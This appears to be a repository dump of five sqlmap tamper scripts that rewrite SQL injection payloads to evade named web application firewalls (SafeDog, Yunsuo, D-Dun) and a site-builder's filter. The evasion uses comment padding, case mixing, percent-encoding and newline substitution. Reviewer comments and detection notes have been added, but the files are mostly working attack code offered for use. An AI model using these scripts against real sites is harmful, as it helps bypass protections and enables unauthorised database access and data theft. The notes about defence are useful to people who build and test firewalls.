├── README.md
├── freebuf安全狗绕过.py
├── sqlmap_bypass_云锁_tamper.py
├── sqlmap_bypass_安全狗_tamper.py
├── sqlmap_bypass_D盾_tamper.py
└── sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py


/README.md:
--------------------------------------------------------------------------------
# sqlmap-tamper
sqlmap绕过waf等脚本

--------------------------------------------------------------------------------
/freebuf安全狗绕过.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

# NOTE(review): re and kb are imported but not referenced in this file.
import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    """Empty hook: this script checks no dependencies."""
    pass

def tamper(payload, **kwargs):
    """
    Rewrite SQL keywords and spaces in the payload with fixed substitutions.

    Applied in this order, each as a case-sensitive str.replace():
    'UNION', 'DATABASE()' and 'USER()' become mixed-case spellings with
    block-comment text attached, every space becomes '/**/', then 'OR' and
    'AND' are wrapped in '/*!14400 ... */' (this looks like MySQL's
    version-conditional comment form -- confirm the intended DBMS).

    Nothing here parses SQL: matching is plain substring replacement, so
    quoted literals and longer words containing a match are rewritten too.
    Returns the payload unchanged when it is empty or None.

    Detection note: the output differs from the input only in letter case
    and inserted comment syntax, so a filter has to decode the request,
    strip or expand comments and fold case before matching keywords;
    parameterised queries remove the injection point regardless of how the
    payload is spelled.
    """

    retVal = payload

    if payload:
        # Order matters: spaces are rewritten before 'OR' / 'AND', so the
        # comments added by the last two replacements keep no padding.
        retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/')
        retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)')
        retVal = retVal.replace('USER()', 'usEr/*!(*/)')
        retVal = retVal.replace(' ', '/**/')
        retVal = retVal.replace('OR', '/*!14400Or*/')
        retVal = retVal.replace('AND', '/*!14400aNd*/')

    return retVal

--------------------------------------------------------------------------------
/sqlmap_bypass_云锁_tamper.py:
--------------------------------------------------------------------------------
# coding=UTF-8
# Desc: sqlmap bypass Yunsuo tamper
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

# NOTE(review): re, kb, singleTimeWarnMessage and DBMS are imported but not
# referenced in this file.
import re

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW


def dependencies():
    """Empty hook: this script checks no dependencies."""
    pass


def tamper(payload, **kwargs):
    """
    Apply five fixed, case-sensitive substring replacements to the payload.

    'ORDER' and 'ALL SELECT' are lower-cased and placed inside '/*!00000'
    comments, 'CONCAT(' gets an empty comment before its parenthesis, '--'
    gets ' */' put in front of it, and 'AND' becomes '%26%26' (the
    percent-encoding of '&&').

    NOTE(review): the 'ALL SELECT' replacement opens '/*!00000select' and
    does not close it; presumably the ' */' inserted before '--' is meant
    to close it -- confirm.
    NOTE(review): there is no guard for an empty payload, so a None payload
    raises AttributeError on the first replace().

    Detection note: keyword matching on the raw request misses these forms;
    percent-decoding and comment expansion have to happen before the match.
    """
    payload = payload.replace('ORDER', '/*!00000order*/')
    payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
    payload = payload.replace('CONCAT(', "CONCAT/**/(")
    payload = payload.replace("--", " */--")
    payload = payload.replace("AND", "%26%26")
    return payload

--------------------------------------------------------------------------------
/sqlmap_bypass_安全狗_tamper.py:
--------------------------------------------------------------------------------
# coding=UTF-8
# Desc: sqlmap_bypass_SafeDog_tamper

# NOTE(review): UNICODE_ENCODING is imported but not referenced in this file.
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
    """Empty hook: this script checks no dependencies."""
    pass
def tamper(payload, **kwargs):
    """
    Pad operators and keywords in the payload with '/*!...*/' comment text.

    In order: spaces become '/*!*/'; '=' and 'AND' get '/*!*/' on both
    sides; '#' and '--' get '/*!*/' in front; the parentheses of 'USER()'
    and 'DATABASE()' are moved inside a '/*!...*/' comment; 'UNION',
    'SELECT' and 'FROM' are lower-cased with '/*!88888cas*/' or
    '/*!99999c*/' comments attached. All matching is case-sensitive
    substring replacement; nothing here parses SQL.

    Side effect: the rewritten payload is written to stdout by a Python 2
    print statement.
    Returns the payload unchanged when it is empty or None.
    """

    if payload:
        # Spaces go first, so the comments added by the later replacements
        # are not themselves padded again.
        payload=payload.replace(" ","/*!*/")
        payload=payload.replace("=","/*!*/=/*!*/")
        payload=payload.replace("AND","/*!*/AND/*!*/")
        payload=payload.replace("UNION","union/*!88888cas*/")
        payload=payload.replace("#","/*!*/#")
        payload=payload.replace("USER()","USER/*!()*/")
        payload=payload.replace("DATABASE()","DATABASE/*!()*/")
        payload=payload.replace("--","/*!*/--")
        payload=payload.replace("SELECT","/*!88888cas*/select")
        payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
        # NOTE(review): debug output in Python 2 syntax. The nesting of this
        # statement could not be recovered from the collapsed listing; it is
        # shown inside the `if` -- confirm against the original file.
        print payload

    return payload

--------------------------------------------------------------------------------
/sqlmap_bypass_D盾_tamper.py:
--------------------------------------------------------------------------------
# coding=UTF-8
# Desc: sqlmap_bypass_D-Dun_tamper

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW


def dependencies():
    """Empty hook: this script checks no dependencies."""
    pass


def tamper(payload, **kwargs):
    """
    Replace spaces outside quoted strings with a fixed SQL block comment.

    Characters are copied one at a time. The first whitespace character of
    any kind is always replaced; quote tracking only starts after it. From
    then on a literal ' ' is replaced unless it sits inside single or
    double quotes; other whitespace (tab, newline) is copied through. The
    body of the replacement comment is percent-encoded text.

    Returns the payload unchanged when it is empty or None.
    Uses xrange(), so as written this runs on Python 2 only.

    Detection note: the replacement is one constant string, so requests
    carrying it can be matched literally in logs; as a general control,
    comments should be stripped before whitespace-sensitive rules run.
    """
    retVal = payload
    if payload:
        retVal = ""
        # quote / doublequote record whether the scan is currently inside a
        # '...' or "..." literal; firstspace flips once, at the first
        # whitespace character.
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                # Before the first whitespace nothing else is inspected:
                # quote characters in this prefix do not toggle the flags.
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                    continue
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                continue
            # Every character that was not replaced is copied unchanged.
            retVal += payload[i]
    return retVal

--------------------------------------------------------------------------------
/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py:
--------------------------------------------------------------------------------
# coding=UTF-8
# Desc: sqlmap_bypass_filter-of-an-enterprise-site-builder_tamper

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    """Empty hook: this script checks no dependencies."""
    pass

def tamper(payload, **kwargs):
    """
    Replace spaces outside quoted strings with a line-feed based marker.

    The first whitespace character of any kind is replaced with '/%OA/'
    (capital letter O); every later ' ' outside single or double quotes is
    replaced with '/%0A/' (digit zero; '%0A' is the percent-encoding of a
    line feed). Other characters are copied through unchanged.

    NOTE(review): the file name and description speak of replacing spaces
    with '%0A'; the code wraps it in slashes, and the first replacement
    spells it with a capital O rather than a zero -- confirm which is
    intended.

    Tested against (as listed by the author; not verifiable from this file):
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass weak and bespoke web application firewalls
        * Uses xrange(), so as written this runs on Python 2 only
        * Detection note: a filter that treats only the space character as
          a token separator does not see these payloads; percent-decode and
          treat all whitespace alike before matching

    >>> tamper('SELECT id FROM users')
    'SELECT/%OA/id/%0A/FROM/%0A/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        # quote / doublequote record whether the scan is currently inside a
        # '...' or "..." literal; firstspace flips once, at the first
        # whitespace character.
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                # Before the first whitespace nothing else is inspected:
                # quote characters in this prefix do not toggle the flags.
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/%OA/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/%0A/"
                continue

            # Every character that was not replaced is copied unchanged.
            retVal += payload[i]

    return retVal

--------------------------------------------------------------------------------